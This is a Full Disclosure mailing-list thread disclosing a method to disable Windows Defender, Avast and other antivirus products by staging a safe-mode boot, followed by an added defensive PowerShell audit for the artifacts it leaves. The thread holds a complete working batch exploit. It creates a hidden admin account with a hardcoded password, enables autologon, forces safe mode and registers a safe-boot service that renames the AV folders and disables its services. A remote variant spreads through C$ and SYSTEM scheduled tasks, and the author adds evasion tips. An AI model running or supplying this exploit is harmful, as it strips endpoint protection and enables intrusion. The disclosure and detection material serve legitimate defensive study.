Message-Id: <89D87E95-AD2B-4EEE-A244-C5062C0B4698@logsat.com>
Date: Tue, 8 Dec 2020 11:56:28 -0500
From: Roberto Franceschetti <roberto@...sat.com>
To: Exibar <exibar@...lair.com>
Cc: fulldisclosure@...lists.org
Subject: Re: [FD] Disable Windows Defender and most other 3rd party antiviruses
No. Secure antivirus deployments would include a "tamper protection" password. You cannot uninstall the AV without knowing that password, even in safe mode. My method bypasses the tamper protection mechanisms in the AV.
Roberto
> On Dec 8, 2020, at 11:13 AM, Exibar <exibar@...lair.com> wrote:
>
> Would this not be the same as uninstalling the AV application in safemode?
>
> -----Original Message-----
> From: Fulldisclosure [mailto:fulldisclosure-bounces@...lists.org] On Behalf
> Of Roberto Franceschetti
> Sent: Sunday, December 6, 2020 9:01 PM
> To: fulldisclosure@...lists.org
> Subject: [FD] Disable Windows Defender and most other 3rd party antiviruses
>
> Windows Defender and most other antivirus applications can be disabled by
> booting into safe mode and renaming their application directories before
> their AV services are started in Windows. The renaming of the directories
> can be performed by creating a Windows NT Service that is allowed to start
> in Safe Mode. While Windows stops most non-Windows, non-critical services
> from starting when booting in Safe mode, I was able to make sure that my
> service is started by adding it to:
> HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\[service name]
>
> I have successfully tested POCs on fully patched Windows 10 and Windows
> Server 2016 machines. In all cases I was able to disable the following
> antivirus products, even if they each had their flavor of password/tamper
> protection enabled:
> Windows Defender
> Avast
> Kaspersky
> F-Secure
> Bitdefender
> [one more product goes here, but as that vendor recognized the issue and has
> worked on a fix I will not mention it]
>
> The POC consists of a single .bat file that can be used to either disable
> the antivirus on the local machine, or one running on a remote endpoint.
>
> Disclosure: Local admin rights are needed on the victim's PC (very common
> for home users). For a remote exploit, this POC additionally requires the
> attacker to have access to the remote C$ share and to be able to schedule
> tasks remotely. Note that this however is a common scenario for IT tech
> support staff - if just one of them is tricked into executing the exploit,
> this could cause all AV protection on all Windows endpoints in the corporate
> network to be disabled.
>
> A sample exploit to disable both Windows Defender and Avast can be found
> below. The code is self-explanatory. On:
> https://logsat.com/WindowsAVBypass/
>
> you can find more details as to why I'm releasing this publicly, along with
> an additional POC sample that is used to disable Bitdefender. Bitdefender
> detects the original POC as malicious, but all that is needed to bypass that
> AV is to split each command in a separate scheduled task. Please note that
> some A/V might now detect this specific code as malicious, but what matters
> is the methodology that allows the AVs to be disabled - the steps can be
> performed in several different ways to go undetected.
>
> A screencast showing the POC remotely disabling Avast and Windows Defender
> is at: https://youtu.be/VE3gwXt6uWg
>
> Roberto Franceschetti
> LogSat Software
>
>
> ============= Avast-DisableAV-Remote.bat ================================
>
> REM - Author: Roberto Franceschetti
> REM - Usage - to disable AV on local machine: C:\>Avast-DisableAV-Remote.bat
> REM - Usage - to disable AV on remote machine: C:\>Avast-DisableAV-Remote.bat TargetComputerName (must be a hostname - IP won't work)
>
> IF NOT [%1] == [] (GOTO Remote) ELSE (GOTO Local)
>
> :Remote
> rem - we are exploiting a remote computer - copy script to victim and schedule task to execute it
> COPY "%~dp0Avast-DisableAV-Remote.bat" \\%1\C$\windows\temp\Avast-DisableAV-Remote.bat
> powershell -command "& {$time = [DateTime]::Now.AddMinutes(1);$hourMinute=$time.ToString('HH:mm');SchTasks.exe /Create /s %1 /SC ONCE /TN 'DisableAvast' /TR 'C:\Windows\temp\Avast-DisableAV-Remote.bat' /ST $hourMinute /F /RU 'SYSTEM' /RL HIGHEST }"
> GOTO :eof
>
> :Local
> rem - We are running .bat locally - run the exploit
> rem - create local admin account used to autologin on first safe boot
> net user AvastBounty "Avast123" /ADD
> net localgroup administrators AvastBounty /add
>
> rem - add autologin registry entries for next reboot
> powershell -command "& { iwr https://live.sysinternals.com/Autologon.exe -OutFile c:\windows\temp\Autologon.exe }"
> c:\windows\temp\Autologon.exe -accepteula AvastBounty . Avast123
>
> rem - Now configure the next reboot in safe mode and autologin
> bcdedit /set {default} safeboot minimal
>
> rem - create the batch file executed by the DisableAvast service after the safe reboot
> rem - will rename ProgramFiles\Avast folders/filesystem drivers, disable WinDefender
> rem - will remove the safeboot/autologon entries and reboot
> rem - note: sc.exe only accepts its options as "option= value", with a space after the "="
>
> @echo off
> echo cd c:\windows\temp > c:\windows\temp\DisableAvastAV.bat
> echo ren "C:\Program Files\Avast Software" "Avast Software Disabled" >> c:\windows\temp\DisableAvastAV.bat
> echo ren "C:\Program Files\Windows Defender" "Windows Defender Disabled" >> c:\windows\temp\DisableAvastAV.bat
> echo ren "C:\Program Files\Windows Defender Advanced Threat Protection" "Windows Defender Advanced Threat Protection Disabled" >> c:\windows\temp\DisableAvastAV.bat
> echo ren "C:\Program Files (x86)\Windows Defender" "Windows Defender Disabled" >> c:\windows\temp\DisableAvastAV.bat
> echo ren "C:\ProgramData\Avast Software" "Avast Software Disabled" >> c:\windows\temp\DisableAvastAV.bat
>
> echo sc config "avast! Antivirus" start= disabled >> c:\windows\temp\DisableAvastAV.bat
> echo sc config "avast! Tools" start= disabled >> c:\windows\temp\DisableAvastAV.bat
> echo sc config "AvastWscReporter" start= disabled >> c:\windows\temp\DisableAvastAV.bat
> echo sc config "aswbIDSAgent" start= disabled >> c:\windows\temp\DisableAvastAV.bat
> echo sc config WinDefend start= disabled >> c:\windows\temp\DisableAvastAV.bat
>
> echo timeout /t 10 >> c:\windows\temp\DisableAvastAV.bat
> echo net stop SAVService >> c:\windows\temp\DisableAvastAV.bat
> echo net stop hmpalertsvc >> c:\windows\temp\DisableAvastAV.bat
> echo timeout /t 10 >> c:\windows\temp\DisableAvastAV.bat
> echo ren "C:\Program Files\Avast" Avast_Disabled >> c:\windows\temp\DisableAvastAV.bat
>
> echo reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /f /t REG_SZ /d "0" >> c:\windows\temp\DisableAvastAV.bat
> echo bcdedit /deletevalue {default} safeboot >> c:\windows\temp\DisableAvastAV.bat
> echo sc delete DisableAvast >> c:\windows\temp\DisableAvastAV.bat
> rem - echo pause >> c:\windows\temp\DisableAvastAV.bat
> echo shutdown /r /f /t 0 >> c:\windows\temp\DisableAvastAV.bat
>
> rem - now create the Powershell script that will create a "DisableAvastAV.exe" that will simply execute the DisableAvastAV.bat batch file above:
> rem - this is done as Windows 10 won't allow a service to run a .bat file, but a .exe will however run once just fine even if the service fails to start
>
> echo $source = @^" > c:\windows\temp\CreateService.ps1
> echo using System; >> c:\windows\temp\CreateService.ps1
> echo class Hello { >> c:\windows\temp\CreateService.ps1
> echo static void Main() { >> c:\windows\temp\CreateService.ps1
> echo System.Diagnostics.Process.Start(^"C:\\Windows\\Temp\\DisableAvastAV.bat^"); >> c:\windows\temp\CreateService.ps1
> echo } >> c:\windows\temp\CreateService.ps1
> echo } >> c:\windows\temp\CreateService.ps1
> echo ^"@ >> c:\windows\temp\CreateService.ps1
> echo Add-Type -TypeDefinition $source -Language CSharp -OutputAssembly ^"C:\Windows\Temp\DisableAvastAV.exe^" >> c:\windows\temp\CreateService.ps1
>
> @echo on
>
> rem - now execute the powershell script to create the DisableAvastAV.exe file and install it as a service:
> powershell set-executionpolicy -executionpolicy bypass
> powershell c:\windows\temp\CreateService.ps1
> sc create DisableAvast binpath= "c:\windows\temp\DisableAvastAV.exe" start= auto
>
> rem - this entry will allow the DisableAvast service to run in Safeboot as well, otherwise it won't start:
> reg add HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\DisableAvast /f /t REG_SZ /d "service"
>
> rem - now reboot... Safe mode will be activated and the DisableAvastAV.exe service will run, calling the DisableAvastAV.bat script, renaming the Avast folders no longer protected by Tamper Protection
> rem - pause
> shutdown /r /f /t 0
>
> =============================================
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
>
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
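Added example, not part of the thread above and not LogSat's code: a PowerShell audit of the staging artifacts the quoted script leaves on a host before its reboot, which is the window in which the attack is still reversible. It checks the SafeBoot\Minimal and SafeBoot\Network keys for services started in safe mode whose binary lives in Windows\Temp or outside the Windows and Program Files trees, whether {default} has a pending bcdedit safeboot setting, whether AutoAdminLogon is on, and whether any scheduled task runs something from Windows\Temp. The function names, the trusted-directory heuristic and the optional KnownGood allow-list are this example's own assumptions; the set of legitimate SafeBoot entries differs between Windows builds and AV products, so the allow-list should come from a clean machine of the same build.

```powershell
# Example added here, not from the original post. Run from an elevated PowerShell 5.1+ prompt.

function Get-SafeBootEntries {
    # Windows starts only the services and driver groups listed under SafeBoot\Minimal
    # (safe mode) and SafeBoot\Network (safe mode with networking). Each subkey's
    # (Default) value is "Service" for a service name or "Driver" for a driver group.
    foreach ($mode in 'Minimal', 'Network') {
        $key = "HKLM:\SYSTEM\CurrentControlSet\Control\SafeBoot\$mode"
        foreach ($sub in Get-ChildItem -Path $key -ErrorAction SilentlyContinue) {
            $default = (Get-ItemProperty -Path $sub.PSPath -ErrorAction SilentlyContinue).'(default)'
            [pscustomobject]@{ Mode = $mode; Name = $sub.PSChildName; Type = [string]$default }
        }
    }
}

function Find-SuspiciousSafeBootServices {
    # Flags safe-mode-allowed services whose binary is in Windows\Temp (where the quoted
    # PoC drops DisableAvastAV.exe) or outside the Windows / Program Files trees, unless
    # the service name is on the caller-supplied allow-list (assumption: baseline from a clean host).
    param([string[]]$KnownGood = @())
    $tempDir = "$env:SystemRoot\Temp\"
    $trusted = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)}) |
        Where-Object { $_ } | ForEach-Object { $_.TrimEnd('\') + '\' }
    foreach ($entry in Get-SafeBootEntries | Where-Object { $_.Type -ieq 'service' }) {
        if ($KnownGood -contains $entry.Name) { continue }
        $svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='$($entry.Name)'" -ErrorAction SilentlyContinue
        if (-not $svc) {
            [pscustomobject]@{ Mode = $entry.Mode; Service = $entry.Name; Binary = '(service not installed)'; StartMode = $null; Account = $null }
            continue
        }
        # PathName is either "quoted path" args or unquoted path args; take just the executable.
        $exe = if ($svc.PathName -match '^"([^"]+)"') { $Matches[1] } else { ($svc.PathName -split '\s+')[0] }
        $inTemp = $exe.StartsWith($tempDir, [StringComparison]::OrdinalIgnoreCase)
        $inTrusted = $trusted | Where-Object { $exe.StartsWith($_, [StringComparison]::OrdinalIgnoreCase) }
        if ($inTemp -or -not $inTrusted) {
            [pscustomobject]@{ Mode = $entry.Mode; Service = $entry.Name; Binary = $exe; StartMode = $svc.StartMode; Account = $svc.StartName }
        }
    }
}

function Test-SafeBootPending {
    # "bcdedit /set {default} safeboot minimal" makes the next boot a safe-mode boot;
    # the setting shows up as a "safeboot" line in the {default} entry.
    $lines = & "$env:SystemRoot\System32\bcdedit.exe" /enum '{default}' 2>$null
    [bool]@($lines -match '^\s*safeboot\s+')
}

function Get-AutoLogonState {
    $wl = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    [pscustomobject]@{
        Enabled           = ($wl.AutoAdminLogon -eq '1')
        UserName          = $wl.DefaultUserName
        # Sysinternals Autologon stores the password as an LSA secret, so a missing
        # plaintext DefaultPassword value does not mean autologon is off.
        PlainTextPassword = [bool]$wl.DefaultPassword
    }
}

function Find-TempScheduledTasks {
    # The remote variant of the PoC runs a .bat from C:\Windows\temp via a SYSTEM scheduled task.
    Get-ScheduledTask -ErrorAction SilentlyContinue | Where-Object {
        ($_.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -like "*$env:SystemRoot\Temp\*"
    } | Select-Object TaskName, TaskPath, State, @{ n = 'RunAs'; e = { $_.Principal.UserId } }
}

# --- report ---
if (Test-SafeBootPending) { Write-Warning 'Next boot is forced into safe mode ({default} has a safeboot entry).' }
$logon = Get-AutoLogonState
if ($logon.Enabled) { Write-Warning "AutoAdminLogon is enabled for '$($logon.UserName)'." }
$hits = @(Find-SuspiciousSafeBootServices)
if ($hits.Count) { $hits | Format-Table -AutoSize } else { 'No unexpected safe-mode services found.' }
$tasks = @(Find-TempScheduledTasks)
if ($tasks.Count) { $tasks | Format-Table -AutoSize }
```

If the audit fires before the reboot, the staging can be undone in place: bcdedit /deletevalue {default} safeboot, deleting the offending SafeBoot\Minimal subkey, sc delete of the service and removal of the autologon entries. On the PoC's remote path the scheduled task runs as SYSTEM about a minute after it is created and the script ends with an immediate forced reboot, so the practical defence is preventing the prerequisites the author lists (local admin, writable C$ and remote task creation) and alerting on writes to the SafeBoot keys and on bcdedit changes rather than relying on a periodic scan.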